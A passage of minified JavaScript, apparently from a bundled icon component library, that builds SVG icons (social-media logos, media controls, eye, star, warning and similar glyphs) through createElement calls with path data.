6.265Z",clipRule:"evenodd"})),messenger_logo_icon_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M1.25 11.677C1.25 5.687 5.945 1.25 12 1.25s10.75 4.44 10.75 10.43c0 5.99-4.695 10.427-10.75 10.427a11.75 11.75 0 0 1-3.112-.414.864.864 0 0 0-.575.043l-2.134.94a.86.86 0 0 1-1.207-.76l-.059-1.913a.85.85 0 0 0-.288-.613c-2.09-1.87-3.375-4.58-3.375-7.713Zm7.452-1.959-3.157 5.01c-.304.48.287 1.02.739.677l3.391-2.575a.644.644 0 0 1 .777-.003l2.513 1.884a1.612 1.612 0 0 0 2.332-.43l3.161-5.006c.301-.481-.29-1.024-.742-.68l-3.391 2.574a.644.644 0 0 1-.777.003l-2.513-1.884a1.613 1.613 0 0 0-2.333.43Z",clipRule:"evenodd"})),microsoft_logo_icon_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M11.25 2.25v9h-9V5A2.75 2.75 0 0 1 5 2.25h6.25Zm1.5 0v9h9V5A2.75 2.75 0 0 0 19 2.25h-6.25Zm9 10.5h-9v9H19A2.75 2.75 0 0 0 21.75 19v-6.25Zm-10.5 9v-9h-9V19A2.75 2.75 0 0 0 5 21.75h6.25Z"})),middle_align_1_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M21 2a1 1 0 1 1 0 2H3a1 1 0 0 1 0-2h18Zm-5 18a1 1 0 1 1 0 2H8a1 1 0 1 1 0-2h8Zm5-6a1 1 0 1 1 0 2H3a1 1 0 1 1 0-2h18Zm-5-6a1 1 0 1 1 0 2H8a1 1 0 0 1 0-2h8Z"})),mobile_smartphone_phone_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M17 22.75A2.75 2.75 0 0 0 19.75 20V4A2.75 2.75 0 0 0 17 1.25H7A2.75 2.75 0 0 0 4.25 4v16A2.75 2.75 0 0 0 7 22.75h10ZM13.5 4a1 1 0 1 1 0 2h-3a1 1 0 1 1 0-2h3Z",clipRule:"evenodd"})),pause_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M2.25 5A2.75 2.75 0 0 1 5 2.25h2.5A2.75 2.75 0 0 1 10.25 5v14a2.75 2.75 0 0 1-2.75 2.75H5A2.75 2.75 0 0 1 2.25 19V5Zm11.5 0a2.75 2.75 0 0 1 2.75-2.75H19A2.75 2.75 0 0 1 21.75 5v14A2.75 2.75 0 0 1 19 21.75h-2.5A2.75 2.75 0 0 1 13.75 19V5Z",clipRule:"evenodd"})),pinterest_logo_icon_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12c0 4.554 2.833 8.448 6.832 10.014-.094-.85-.178-2.159.038-3.087.195-.84 1.26-5.344 1.26-5.344s-.321-.644-.321-1.596c0-1.495.866-2.61 1.945-2.61.917 0 1.36.688 1.36 1.514 0 .922-.587 2.301-.89 3.579-.254 1.07.536 1.943 1.592 1.943 1.91 0 3.379-2.015 3.379-4.923 0-2.574-1.85-4.374-4.49-4.374-3.06 0-4.855 2.295-4.855 4.665 0 .925.356 1.915.8 2.454.088.106.101.2.075.308-.082.34-.263 1.07-.298 1.22-.047.196-.156.238-.36.143-1.343-.625-2.182-2.588-2.182-4.165 0-3.39 2.464-6.505 7.103-6.505 3.729 0 6.627 2.657 6.627 6.209 0 3.705-2.336 6.686-5.578 6.686-1.09 0-2.114-.566-2.464-1.234 0 0-.54 2.053-.67 2.555-.243.934-.898 2.105-1.336 2.819A10.76 10.76 0 0 0 12 22.75c5.937 0 10.75-4.813 10.75-10.75S17.937 1.25 12 1.25Z"})),play_media_video_circle_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M12 22.75c5.936 0 10.75-4.813 10.75-10.75S17.936 1.25 12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75ZM10.416 7.376A.75.75 0 0 0 9.25 8v8a.75.75 0 0 0 1.166.624l6-4a.75.75 0 0 0 0-1.248l-6-4Z",clipRule:"evenodd"})),price_tag_label_category_sale_discount_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M21.444 13.616a2.75 2.75 0 0 0 .806-1.944V3.5a1.75 1.75 0 0 0-1.75-1.75h-8.172c-.73 0-1.429.29-1.945.806l-8 8a2.75 2.75 0 0 0 0 3.888l7.172 7.172a2.75 2.75 0 0 0 3.889 0l8-8ZM8.707 12.293a1 1 0 1 0-1.414 1.414l3 3 .076.068a1 1 0 0 0 1.406-1.406l-.068-.076-3-3ZM18 7.5a1.5 1.5 0 1 1-3 0 1.5 1.5 0 0 1 3 0Z",clipRule:"evenodd"})),price_tag_offer_sale_coupon_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M18.796 6.963c-.367 1.048-1.172 1.993-2.432 2.693a.75.75 0 1 1-.728-1.311c.99-.55 1.517-1.229 1.744-1.878a2.583 2.583 0 0 0-.1-1.941c-.55-1.208-1.999-2.11-3.853-1.618-2.791.74-6.15 1.333-9.695-.024a.75.75 0 1 1 .536-1.401c3.09 1.183 6.062.695 8.774-.025 2.566-.68 4.75.577 5.603 2.445.425.933.517 2.017.151 3.06Z",clipRule:"evenodd"}),(0,a.createElement)("path",{fillRule:"evenodd",d:"M19.74 7.294c-.46 1.313-1.45 2.436-2.89 3.236a1.75 1.75 0 1 1-1.7-3.06c.81-.45 1.152-.95 1.286-1.333a1.59 1.59 0 0 0-.066-1.197 1.835 1.835 0 0 0-.101-.19h-4.44c-.73 0-1.43.29-1.945.805l-6.5 6.5a2.75 2.75 0 0 0 0 3.89l6.171 6.171a2.75 2.75 0 0 0 3.89 0l6.5-6.5a2.75 2.75 0 0 0 .805-1.944V6.5c0-.598-.3-1.127-.759-1.442.083.73.01 1.49-.252 2.236Zm-8.71 5.176a.75.75 0 0 0-1.06 1.06l2 2a.75.75 0 0 0 1.06-1.06l-2-2Zm-2.5 1.5a.75.75 0 0 0-1.06 1.06l3 3a.75.75 0 0 0 1.06-1.06l-3-3Z",clipRule:"evenodd"})),reddit_logo_icon_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M13.875 4.75h2.354a2.751 2.751 0 1 0 0-1.5h-2.354A2.75 2.75 0 0 0 11.125 6v2.028c-1.76.115-3.39.571-4.771 1.281a2.875 2.875 0 1 0-3.964 4.109A5.777 5.777 0 0 0 2 15.5C2 19.642 6.477 23 12 23s10-3.358 10-7.5c0-.722-.136-1.421-.39-2.082a2.875 2.875 0 1 0-3.963-4.109C16.2 8.566 14.48 8.1 12.624 8.014V6c0-.69.56-1.25 1.25-1.25ZM9 14.5a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Zm0 2.97a.75.75 0 0 0-1.06 1.06c.954.955 2.57 1.345 4.03 1.345 1.46 0 3.075-.39 4.03-1.345a.75.75 0 0 0-1.06-1.06c-.546.545-1.68.905-2.97.905-1.29 0-2.424-.36-2.97-.905ZM16.5 13a1.5 1.5 0 1 1-3 0 1.5 1.5 0 0 1 3 0Z",clipRule:"evenodd"})),refresh_reset_cycle_loop_infinity_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M3 21v-5a1 1 0 0 1 1-1h5a1 1 0 1 1 0 2H5.756A7.977 7.977 0 0 0 12 20a8 8 0 0 0 8-8 1 1 0 1 1 2 0c0 5.523-4.477 10-10 10a9.967 9.967 0 0 1-7-2.863V21a1 1 0 1 1-2 0Zm-1-9C2 6.477 6.477 2 12 2a9.966 9.966 0 0 1 7 2.86V3a1 1 0 1 1 2 0v5a1 1 0 0 1-1 1h-5a1 1 0 1 1 0-2h3.245A8 8 0 0 0 4 12a1 1 0 1 1-2 0Z"})),restriction_no_stop_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M12 1c6.075 0 11 4.925 11 11s-4.925 11-11 11S1 18.075 1 12 5.925 1 12 1ZM6.383 19.03A9 9 0 0 0 19.03 6.383L6.383 19.03ZM12 3a9 9 0 0 0-7.031 14.616L17.616 4.97A8.96 8.96 0 0 0 12 3Z",clipRule:"evenodd"})),right_align_1_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M21 2a1 1 0 1 1 0 2H3a1 1 0 0 1 0-2h18Zm0 18a1 1 0 1 1 0 2h-8a1 1 0 1 1 0-2h8Zm0-6a1 1 0 1 1 0 2H3a1 1 0 1 1 0-2h18Zm0-6a1 1 0 1 1 0 2h-8a1 1 0 1 1 0-2h8Z"})),right_triangle_angle_play_arrow_forward_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M6.25 5c0-1.442 1.646-2.265 2.8-1.4l9.334 7c.933.7.933 2.1 0 2.8l-9.334 7c-1.154.865-2.8.042-2.8-1.4V5Z"})),search_magnify_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M16.618 18.032a9 9 0 1 1 1.414-1.414l3.675 3.675a1 1 0 0 1-1.414 1.414l-3.675-3.675ZM4 11a7 7 0 1 1 12.042 4.856 1.006 1.006 0 0 0-.186.186A7 7 0 0 1 4 11Z",clipRule:"evenodd"}),(0,a.createElement)("path",{fillRule:"evenodd",d:"M10 6.5a1 1 0 0 1 1-1 5.5 5.5 0 0 1 5.5 5.5 1 1 0 1 1-2 0A3.5 3.5 0 0 0 11 7.5a1 1 0 0 1-1-1Z",clipRule:"evenodd"})),settings_tool_function_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M15.183 2.612a1.75 1.75 0 0 0-1.706-1.362h-2.953a1.75 1.75 0 0 0-1.706 1.362l-.355 1.562a1.25 1.25 0 0 1-1.587.918L5.25 4.59a1.75 1.75 0 0 0-2.021.782L1.772 7.837a1.75 1.75 0 0 0 .338 2.193l1.16 1.04a1.25 1.25 0 0 1 0 1.862L2.11 13.97a1.75 1.75 0 0 0-.337 2.193l1.455 2.464a1.751 1.751 0 0 0 2.021.783l1.628-.5a1.25 1.25 0 0 1 1.586.917l.355 1.56a1.75 1.75 0 0 0 1.707 1.363h2.952a1.75 1.75 0 0 0 1.706-1.362l.355-1.56a1.25 1.25 0 0 1 1.586-.919l1.628.501a1.75 1.75 0 0 0 2.02-.783l1.457-2.464a1.75 1.75 0 0 0-.34-2.193l-1.157-1.038a1.25 1.25 0 0 1 0-1.863l1.159-1.039a1.75 1.75 0 0 0 .338-2.193l-1.456-2.464a1.75 1.75 0 0 0-2.02-.782l-1.629.5a1.25 1.25 0 0 1-1.586-.917l-.355-1.562ZM15 12a3 3 0 1 1-6 0 3 3 0 0 1 6 0Z",clipRule:"evenodd"})),share_social_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"m9.075 9.42 5.865-2.933a3.45 3.45 0 1 1 1.005 1.734l-5.976 2.988a3.915 3.915 0 0 1 0 1.583l5.976 2.987a3.45 3.45 0 1 1-1.005 1.734L9.074 14.58a3.9 3.9 0 1 1 0-5.16Z",clipRule:"evenodd"})),shopping_cart_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M9.75 19.25a1 1 0 1 0-2 0 1 1 0 0 0 2 0Zm9.75 0a1 1 0 1 0-2 0 1 1 0 0 0 2 0Zm1.5 0a2.5 2.5 0 1 1-4.79-1h-5.17a2.5 2.5 0 1 1-4.33-.442 1.745 1.745 0 0 1-.572-1.069L4.376 3.966a.25.25 0 0 0-.247-.216H2a.75.75 0 0 1 0-1.5h2.129a1.75 1.75 0 0 1 1.733 1.51l.068.49h14.874a1.75 1.75 0 0 1 1.722 2.06l-1.152 6.403a1.75 1.75 0 0 1-1.572 1.434l-12.36 1.067.182 1.32a.25.25 0 0 0 .247.216H18.5a2.5 2.5 0 0 1 2.5 2.5Z"})),skype_logo_icon_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M7.5 1.25a6.25 6.25 0 0 0-5.197 9.723 9.75 9.75 0 0 0 10.724 10.724 6.25 6.25 0 0 0 8.67-8.67A9.75 9.75 0 0 0 10.973 2.303 6.224 6.224 0 0 0 7.5 1.25Zm4.5 6C9.8 7.25 8.25 8.4 8.25 10c0 1.015.647 1.627 1.337 1.991.644.34 1.468.546 2.178.723l.053.014c.778.194 1.429.361 1.894.607.435.23.538.43.538.665 0 .4-.45 1.25-2.25 1.25S9.75 14.4 9.75 14a.75.75 0 0 0-1.5 0c0 1.6 1.55 2.75 3.75 2.75s3.75-1.15 3.75-2.75c0-1.015-.647-1.627-1.337-1.991-.644-.34-1.468-.546-2.178-.723l-.053-.014c-.778-.194-1.429-.361-1.894-.607-.435-.23-.538-.43-.538-.665 0-.4.45-1.25 2.25-1.25s2.25.85 2.25 1.25a.75.75 0 0 0 1.5 0c0-1.6-1.55-2.75-3.75-2.75Z",clipRule:"evenodd"})),smile_emoji_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25ZM8.5 7.5a1 1 0 0 1 1 1V10a1 1 0 1 1-2 0V8.5a1 1 0 0 1 1-1Zm7 0a1 1 0 0 1 1 1V10a1 1 0 1 1-2 0V8.5a1 1 0 0 1 1-1Zm-7.556 6.275a.75.75 0 1 0-1.43.45 5.752 5.752 0 0 0 10.973 0 .75.75 0 1 0-1.431-.45 4.252 4.252 0 0 1-8.112 0Z",clipRule:"evenodd"})),social_community_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M12 1.75a3.384 3.384 0 0 1 3.238 2.408C18.858 5.46 21.4 8.895 21.4 13c0 .506-.039 1.002-.113 1.486a3.388 3.388 0 0 1 1.463 2.791 3.386 3.386 0 0 1-4.785 3.085A9.3 9.3 0 0 1 12 22.5a9.302 9.302 0 0 1-5.965-2.138 3.386 3.386 0 0 1-4.785-3.085c0-1.156.579-2.179 1.463-2.79A9.77 9.77 0 0 1 2.6 13c0-4.105 2.543-7.54 6.162-8.841A3.384 3.384 0 0 1 12 1.75ZM19.4 13c0-2.998-1.707-5.533-4.22-6.704A3.383 3.383 0 0 1 12 8.527a3.383 3.383 0 0 1-3.18-2.231C6.307 7.467 4.6 10.002 4.6 13c0 .301.017.598.05.889a3.385 3.385 0 0 1 3.363 3.388c0 .63-.172 1.221-.471 1.727A7.322 7.322 0 0 0 12 20.5a7.321 7.321 0 0 0 4.458-1.495 3.384 3.384 0 0 1-.47-1.728 3.385 3.385 0 0 1 3.361-3.388c.034-.291.05-.588.05-.889Z",clipRule:"evenodd"})),square_rounded_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M21.75 19A2.75 2.75 0 0 1 19 21.75H5A2.75 2.75 0 0 1 2.25 19V5A2.75 2.75 0 0 1 5 2.25h14A2.75 2.75 0 0 1 21.75 5v14Z"})),star_rating_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M10.3 2.793c.67-1.443 2.73-1.443 3.4 0l2.136 4.602a.294.294 0 0 0 .232.166l5.068.596c1.578.186 2.232 2.136 1.05 3.222l-3.748 3.444a.28.28 0 0 0-.087.261l.995 4.975c.315 1.574-1.369 2.76-2.75 1.99l-4.45-2.474a.3.3 0 0 0-.291 0l-4.45 2.475c-1.382.768-3.065-.417-2.75-1.991l.995-4.975a.28.28 0 0 0-.087-.26l-3.748-3.445c-1.182-1.086-.529-3.036 1.05-3.222l5.067-.596a.293.293 0 0 0 .232-.166L10.3 2.793Z"})),stopwatch_reading_time_timer_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M15 1.5a1 1 0 0 0-1-1h-4a1 1 0 1 0 0 2h1v.8c-4.915.502-8.75 4.653-8.75 9.7 0 5.385 4.365 9.75 9.75 9.75s9.75-4.365 9.75-9.75c0-5.047-3.835-9.198-8.75-9.7v-.8h1a1 1 0 0 0 1-1Zm-4 6a1 1 0 1 1 2 0v4.985l3.081 2.202.08.063a1 1 0 0 1-1.156 1.62l-.086-.056-3.5-2.5A1 1 0 0 1 11 13V7.5Z",clipRule:"evenodd"}),(0,a.createElement)("path",{d:"M18.293 3.293a1 1 0 0 1 1.414 0l2 2 .068.076a1 1 0 0 1-1.406 1.406l-.076-.068-2-2a1 1 0 0 1 0-1.414Z"})),tablet_ipad_pad_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M18 22.75A2.75 2.75 0 0 0 20.75 20V4A2.75 2.75 0 0 0 18 1.25H6A2.75 2.75 0 0 0 3.25 4v16A2.75 2.75 0 0 0 6 22.75h12ZM12.01 4a1 1 0 1 1 0 2C11.457 6 11 5.552 11 5s.457-1 1.01-1Z",clipRule:"evenodd"})),tag_bookmark_save_favourite_mark_discount_solid_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M20.75 22a.75.75 0 0 1-1.2.6l-6.8-5.1a1.25 1.25 0 0 0-1.415-.059l-.085.059-6.8 5.1a.75.75 0 0 1-1.2-.6V4A2.75 2.75 0 0 1 6 1.25h12A2.75 2.75 0 0 1 20.75 4v18Z"})),tiktok_logo_icon_circle_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25Zm2.364 5.25a1 1 0 1 0-2 0v7.792a2.195 2.195 0 0 1-2.182 2.208A2.195 2.195 0 0 1 8 14.292c0-1.228.985-2.209 2.182-2.209a1 1 0 1 0 0-2C7.864 10.083 6 11.975 6 14.292c0 2.316 1.864 4.208 4.182 4.208 2.317 0 4.182-1.892 4.182-4.208V9.934a4.74 4.74 0 0 0 2.636.774 1 1 0 1 0 0-2c-1.713 0-2.636-1.377-2.636-2.208Z",clipRule:"evenodd"})),tiktok_logo_icon_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M19 21.75A2.75 2.75 0 0 0 21.75 19V5A2.75 2.75 0 0 0 19 2.25H5A2.75 2.75 0 0 0 2.25 5v14A2.75 2.75 0 0 0 5 21.75h14ZM6 14.292c0-2.316 1.864-4.209 4.182-4.209a1 1 0 0 1 0 2c-1.197 0-2.182.982-2.182 2.209s.985 2.208 2.182 2.208 2.181-.98 2.181-2.208V6.5a1 1 0 0 1 2 0c0 .83.924 2.208 2.637 2.208a1 1 0 0 1 0 2 4.738 4.738 0 0 1-2.637-.776v4.36c0 2.316-1.864 4.208-4.181 4.208C7.864 18.5 6 16.608 6 14.292Z",clipRule:"evenodd"})),triangle_rounded_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M9.623 3.632c1.054-1.842 3.7-1.842 4.754 0l8.006 13.997c1.046 1.828-.263 4.121-2.377 4.121H3.994c-2.113 0-3.422-2.293-2.377-4.121L9.623 3.632Z",clipRule:"evenodd"})),triangle_shape_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M12 2.25a.75.75 0 0 1 .646.37l10 17A.75.75 0 0 1 22 20.75H2a.75.75 0 0 1-.646-1.13l10-17A.75.75 0 0 1 12 2.25Z",clipRule:"evenodd"})),twitter_x_logo_icon_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M20.292 2.293a1.001 1.001 0 0 1 1.415 1.414l-7.125 7.124 7.026 9.73A.751.751 0 0 1 21 21.75h-5a.751.751 0 0 1-.608-.311l-4.789-6.63-6.896 6.897a1 1 0 0 1-1.414-1.415l7.124-7.125L2.392 3.44A.751.751 0 0 1 3 2.25h5l.09.005a.751.751 0 0 1 .518.306l4.787 6.628 6.897-6.896Z",clipRule:"evenodd"})),upload_1_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M11.47 12.47a.75.75 0 0 1 1.06 0l2.5 2.5a.75.75 0 0 1-.53 1.28h-1.75V21a.75.75 0 0 1-1.5 0v-4.75H9.5a.75.75 0 0 1-.53-1.28l2.5-2.5Z",clipRule:"evenodd"}),(0,a.createElement)("path",{fillRule:"evenodd",d:"M5.5 9.236a.865.865 0 0 0 .107-.04 3.548 3.548 0 0 1 2.123-.062 1 1 0 0 0 .54-1.925 5.583 5.583 0 0 0-1.467-.21 6 6 0 0 1 10.803 5.144 1 1 0 1 0 1.869.714c.163-.427.29-.872.38-1.33A3.081 3.081 0 0 1 21 13.936c0 1.437-.966 2.632-2.253 2.968a1 1 0 1 0 .506 1.935C21.417 18.274 23 16.286 23 13.936a5.067 5.067 0 0 0-3.032-4.656 8 8 0 0 0-15.58-1.745c-1.528.723-2.734 2.128-3.193 3.924-.806 3.156.967 6.46 4.068 7.332.189.053.378.096.568.128a1 1 0 1 0 .34-1.97 3.61 3.61 0 0 1-.367-.083c-1.983-.558-3.227-2.735-2.671-4.912.339-1.328 1.255-2.296 2.366-2.718Z",clipRule:"evenodd"})),view_count_show_visible_eye_open_1_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"m23.67 11.663-.015-.03-.032-.06-.007-.013a18.339 18.339 0 0 0-.72-1.217 20.43 20.43 0 0 0-2.224-2.856C18.733 5.42 15.799 3.25 12 3.25c-3.8 0-6.734 2.17-8.672 4.237a20.43 20.43 0 0 0-2.796 3.801 11.69 11.69 0 0 0-.149.272l-.007.014-.032.06-.015.03a.76.76 0 0 0 0 .673l.015.03.032.06.007.013a18.262 18.262 0 0 0 .72 1.217 20.432 20.432 0 0 0 2.225 2.856C5.266 18.58 8.2 20.75 12 20.75c3.8 0 6.733-2.17 8.672-4.237a20.433 20.433 0 0 0 2.795-3.801c.065-.115.115-.208.149-.272l.007-.013.02-.037.012-.024.015-.03a.756.756 0 0 0 0-.673ZM12 5.75a4.25 4.25 0 1 1 0 8.5 4.25 4.25 0 0 1 0-8.5Z",clipRule:"evenodd"})),view_count_show_visible_eye_open_2_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"m.33 11.664.015-.03.032-.06.007-.014a18.263 18.263 0 0 1 .72-1.217 20.43 20.43 0 0 1 2.224-2.856C5.268 5.42 8.201 3.25 12 3.25c3.8 0 6.734 2.17 8.672 4.237a20.425 20.425 0 0 1 2.796 3.801c.065.115.115.208.149.272l.007.014.032.06.014.03a.75.75 0 0 1 .001.672l-.015.03a5.739 5.739 0 0 1-.032.06l-.007.014a18.252 18.252 0 0 1-.72 1.217 20.427 20.427 0 0 1-2.225 2.856C18.734 18.58 15.8 20.75 12 20.75c-3.8 0-6.733-2.17-8.671-4.237a20.432 20.432 0 0 1-2.796-3.801 12.06 12.06 0 0 1-.149-.272l-.007-.013-.032-.06-.015-.03a.756.756 0 0 1 0-.673ZM15.75 12a3.75 3.75 0 1 1-7.5 0 3.75 3.75 0 0 1 7.5 0Z",clipRule:"evenodd"})),view_count_show_visible_eye_open_3_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M23.616 11.573C20.503 7.077 16.29 4.75 12 4.75c-4.291 0-8.504 2.327-11.617 6.823a.75.75 0 0 0 0 .854C3.496 16.922 7.71 19.25 12 19.25c4.29 0 8.503-2.328 11.616-6.823a.75.75 0 0 0 0-.854ZM17.25 12a5.25 5.25 0 1 0-10.5 0 5.25 5.25 0 0 0 10.5 0Z",clipRule:"evenodd"}),(0,a.createElement)("path",{d:"M14.25 12A2.25 2.25 0 0 0 12 9.75a.75.75 0 0 1 0-1.5A3.75 3.75 0 0 1 15.75 12a.75.75 0 0 1-1.5 0Z"})),view_count_show_visible_eye_open_4_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M14.25 10a1.75 1.75 0 0 0 3.366.673l.049-.098a.751.751 0 0 1 1.318.06 7.75 7.75 0 1 1-3.62-3.62.75.75 0 0 1-.036 1.369A1.751 1.751 0 0 0 14.25 10Z"}),(0,a.createElement)("path",{d:"M12 2c4.335 0 8.706 2.263 10.89 6.546a1 1 0 1 1-1.78.908C19.301 5.911 15.664 4 12 4 8.335 4 4.698 5.911 2.89 9.454a1 1 0 0 1-1.78-.908C3.293 4.263 7.664 2 12 2Z"})),view_count_show_visible_eye_open_5_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M16.75 12H12V7.25A4.75 4.75 0 1 0 16.75 12Z"}),(0,a.createElement)("path",{fillRule:"evenodd",d:"m23.167 12.083.727.364c.141-.281.14-.613 0-.895l-.002-.003-.003-.007-.011-.022a10.615 10.615 0 0 0-.192-.354 20.675 20.675 0 0 0-2.831-3.85C18.895 5.226 15.899 3 12 3 8.1 3 5.104 5.226 3.145 7.316a20.674 20.674 0 0 0-2.831 3.85 12.375 12.375 0 0 0-.192.354l-.011.022-.003.007-.002.002s0 .002.894.449l-.894-.447a1 1 0 0 0 0 .894l.002.004.003.007.011.022a8.267 8.267 0 0 0 .192.354 20.67 20.67 0 0 0 2.831 3.85C5.105 18.774 8.1 21 12 21c3.9 0 6.895-2.226 8.855-4.316a20.672 20.672 0 0 0 2.831-3.85 11.81 11.81 0 0 0 .175-.322l.017-.032.011-.022.003-.007.002-.002s0-.002-.727-.366Zm-.096-.119.823-.412-.823.412ZM12 5a7 7 0 1 0 0 14 7 7 0 0 0 0-14Z",clipRule:"evenodd"})),warning_circle_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25ZM13 8a1 1 0 1 0-2 0v4a1 1 0 1 0 2 0V8Zm-1 6.75a1.25 1.25 0 1 0 0 2.5 1.25 1.25 0 0 0 0-2.5Z",clipRule:"evenodd"})),warning_triangle_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M9.623 3.632c1.054-1.842 3.7-1.842 4.754 0l8.006 13.997c1.046 1.828-.263 4.121-2.377 4.121H3.994c-2.113 0-3.422-2.293-2.377-4.121L9.623 3.632ZM11 